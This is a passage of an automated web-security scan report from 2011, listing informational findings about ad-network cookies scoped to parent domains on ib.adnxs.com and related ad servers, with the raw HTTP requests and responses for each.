Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:00:24 GMT
Content-Length: 1491

document.write('<a href="http://ib.adnxs.com/click/DPqCvqAv-D_NzMzMzMz0PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BA
...[SNIP]...
9.43. http://ib.adnxs.com/getuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:12 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=2724386019227846218
Date: Mon, 09 May 2011 14:00:12 GMT
Content-Length: 0

9.44. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /if?enc=XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAgMCAAUAAAAAOCNlQgAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949676%29%3Buf%28%27r%27%2C+184995%2C+1304949676%29%3B&cnd=!Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; sess=1; uuid2=2724386019227846218; icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:01:25 GMT
Content-Length: 530

<script language="JavaScript" src="http://mf.sitescout.com/tag.jsp?pid=0C66F16&w=728&h=90&rnd=1304949683&cm=http://ib.adnxs.com/click/XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSs
...[SNIP]...
9.45. http://ib.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=311&user=11f8f328940989e&seg_code=cm.ent_l,cm.music_h,ti.aal,bz.25,dx.16,dx.23,dx.17,rt.truecredit2,qc.ae,qc.ac,idgt.careers_l&ord=1304949578 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#-r-98m2jrr-%SN'CJQE2F!)VKr0:$5r$<o/e@)WesS%k+n*I('YxYT*<N@6F+c(io$N-%L1@9'b[5(:jB-9V[OUYy9.R5e[ytcpQ`bMH@TW6X$3_sCR$6Xedk-G'TDF.mC`)B_N$6LQR^Q1gg.MkA)P$tfA)DWsB'hbJ<Zo?BY+A8^^2)oHZ5mIqhtj<v4iwpkyYITX547eLID>>z*PI7v'je[t@sbTLvZL[5/^@u)U'+YE]A*I/WjMFL7TH)6(3+$CLIE.`Q02p!/Bh8LJdJMOI#teJcaJ2gAxMkoDkRfC>:upDX3r@Xk!*_O@<)?o7FEG#?s@>3rsZ:NP+SZwInEb8?uR<<.1bW>zC'DHc(RjR_5cV/>hV4<.Ep_Brg%LYIKnl%jfU4H4E7-mJZW+LULZ/rSrz3JC#MNpp09cPRI)3/W$VKQg4AB[7:`laDI'0.])0*DP]MTFF+TEc'nRbjb[T9R5j$WfUnk:l:dTEaTSKXEV/XvsO=)MPZ#H-A8'm1SbZ-hlwo/uIEE1WKi>%cMg!FYc3gk*_!.KhjIbfv>n6icJz]`pNnloA:BN7K@E`FgYF*-qn0v`vWZ1n

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ(]G)_`x=M7Yqu/-]C*<OrJiXuLYTO`g0UkVr@%.RF2bQZ@j#4^3C.?o<b/8<L'U16EY8/^((w(nAV$<1`/('a^!sSG$UxhO.IO%YAI:rj?.Xae`ue`kZAlt:BZUi'2@YA@MPB>J8D.Zf(Y>:H$>Lb@C.JG2!$s>T6eS6]+Yz4(E3*crWg(/N]#.IASyBEK$4mNdV8`wP4Zf7SJ_5J?`oPNf+[aM*eil^_*.IeAI)9Dn!->2knC56GW[oggLmEZ_[lvZ_cz.ae-?yi.#gk0qd(%ZwsfuTbvd+M<X2/_RcUaefE=AkL5zD[%aB7w!)mWC[3BIbZkKzh5D#5oPpwcj6!3O:F-g%UQUTMq8Q^kMwpL>b1'r6eZHjiY`Lf!rG3XusDrRPXBZ!lcH[[(<hO%VT<@[_(VO4iF>IwkPWeno>EIPasogQE9accK4xDD2M#lZT0N6k4oI8bdT)SH.T2E2vx*W*YtkpGDme#!PwhxFm/J_@[x!07wLVxCV0.t9lG=*w!X=ar9V%`BQp1.kL`Y6G+(@22xX(k[k0D%a5tzz_b44.VGe1$-J=B.djI?-8Xc=5KWeZZh^p0Y*xSM$BxcJt5_BwmEM%y<lxnTzkVwz^+^n8^ky; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 13:59:40 GMT

GIF89a.............!.......,........@..L..;
9.46. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.tribune&size=300x600&imp_id=cm-87971011_1304949578,11f8f328940989e&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.tribune%2Fuscell_ldev_300x600_05311%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.{PRICEBUCKET}-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D5044004%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#-r-98m2jrr-%SN'CJQE2F!)VKr0:$5r$<o/e@)WesS%k+n*I('YxYT*<N@6F+c(io$N-%L1@9'b[5(:jB-9V[OUYy9.R5e[ytcpQ`bMH@TW6X$3_sCR$6Xedk-G'TDF.mC`)B_N$6LQR^Q1gg.MkA)P$tfA)DWsB'hbJ<Zo?BY+A8^^2)oHZ5mIqhtj<v4iwpkyYITX547eLID>>z*PI7v'je[t@sbTLvZL[5/^@u)U'+YE]A*I/WjMFL7TH)6(3+$CLIE.`Q02p!/Bh8LJdJMOI#teJcaJ2gAxMkoDkRfC>:upDX3r@Xk!*_O@<)?o7FEG#?s@>3rsZ:NP+SZwInEb8?uR<<.1bW>zC'DHc(RjR_5cV/>hV4<.Ep_Brg%LYIKnl%jfU4H4E7-mJZW+LULZ/rSrz3JC#MNpp09cPRI)3/W$VKQg4AB[7:`laDI'0.])0*DP]MTFF+TEc'nRbjb[T9R5j$WfUnk:l:dTEaTSKXEV/XvsO=)MPZ#H-A8'm1SbZ-hlwo/uIEE1WKi>%cMg!FYc3gk*_!.KhjIbfv>n6icJz]`pNnloA:BN7K@E`FgYF*-qn0v`vWZ1n

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwzOaf7gQQzOaf7gQYAA..; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ%E]*wn6#L)u[/9vF(#Y0hCyOq4zX.]@%YeDfOm%>H*7YB.%bEM]y->w8KvAo2=dOe[sU:l.T_/[NYl(2Eh>8Xvm?rd_r=>@v12n1PPr83x.yt9kLh`*HT%BGdWyHjK6f0cX7I[xMnk2l%9TDEFPbl>j#IWjYmS?2Slf#n2GlZ?NtukNevrCBvNv$/LeQb#NWY6#p?5Iu_J$i)=dJF%'fnWsjMXB<Asu#1y3xlChN'hH`mL%?2OPWu4C5'7Q:h(JfD(sdhR.k05YkrZhE:rjV(mIlaW+!0co/_ZL*i)<k1)OMwY=fQs2/?WvG99-nO6Z+uf@aoxi@q`Kpcu'mnyC_.Lkbk-f#OOUe<q.80]f[@i1ga+uzgRuJ$'bbRz!=-@wnl$(Rx5Htg)4_GEmX>8j%0wr@pc*n6nSnSFrzhz/1Vt7obj(Fj#<8xba6Nf94EPZmt6turO7C<00`E$Kx1gBKW-'n(.0)'[-r%'(8>+t=kBU92d^_ZgS'^q6A:q-s]UkdZGZ9<vX!u1FsK@GgtGyJHdlIU:WFV/!Z_7='J9^-KvkXh*lzRgL33)!PQ!odnpnaw$jg1t]wZM+J$n!lhf)z]`%I4TZ`kCG1; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 13:59:40 GMT
Content-Length: 618

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311;net=cm;u=,cm-87971011_1304949578,11f8f328940989e,ent,ax.-cm.ent_l-cm.music_h-ti
...[SNIP]...
9.47. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=18004,21295&remove=14924,17995,17996,17997,17998,17999,18000,18001,18002,18003,37689,38793&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; uuid2=2724386019227846218; anj=Kfw)(CZ%E]*wn6#L)u[/9vF(#Y0hCyOq4zX.]@%YeDfOm%>H*7YB.%bEM]y->w8KvAo2=dOe[sU:l.T_/[NYl(2Eh>8Xvm?rd_r=>@v12n1PPr83x.yt9kLh`*HT%BGdWyHjK6f0cX7I[xMnk2l%9TDEFPbl>j#IWjYmS?2Slf#n2GlZ?NtukNevrCBvNv$/LeQb#NWY6#p?5Iu_J$i)=dJF%'fnWsjMXB<Asu#1y3xlChN'hH`mL%?2OPWu4C5'7Q:h(JfD(sdhR.k05YkrZhE:rjV(mIlaW+!0co/_ZL*i)<k1)OMwY=fQs2/?WvG99-nO6Z+uf@aoxi@q`Kpcu'mnyC_.Lkbk-f#OOUe<q.80]f[@i1ga+uzgRuJ$'bbRz!=-@wnl$(Rx5Htg)4_GEmX>8j%0wr@pc*n6nSnSFrzhz/1Vt7obj(Fj#<8xba6Nf94EPZmt6turO7C<00`E$Kx1gBKW-'n(.0)'[-r%'(8>+t=kBU92d^_ZgS'^q6A:q-s]UkdZGZ9<vX!u1FsK@GgtGyJHdlIU:WFV/!Z_7='J9^-KvkXh*lzRgL33)!PQ!odnpnaw$jg1t]wZM+J$n!lhf)z]`%I4TZ`kCG1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 13:59:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[; path=/; expires=Sun, 07-Aug-2011 13:59:45 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 13:59:45 GMT

GIF89a.............!.......,........@..L..;
9.48. http://ib.adnxs.com/ttj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ttj?id=407559&pubclick=[INSERT_CLICK_TAG] HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATCm55_uBBCm55_uBBgB; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; path=/; expires=Sun, 07-Aug-2011 14:01:24 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 14:01:24 GMT
Content-Length: 629

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2s
...[SNIP]...
9.49. http://idpix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=5392 HTTP/1.1
Host: idpix.media6degrees.com
Proxy-Connection: keep-alive
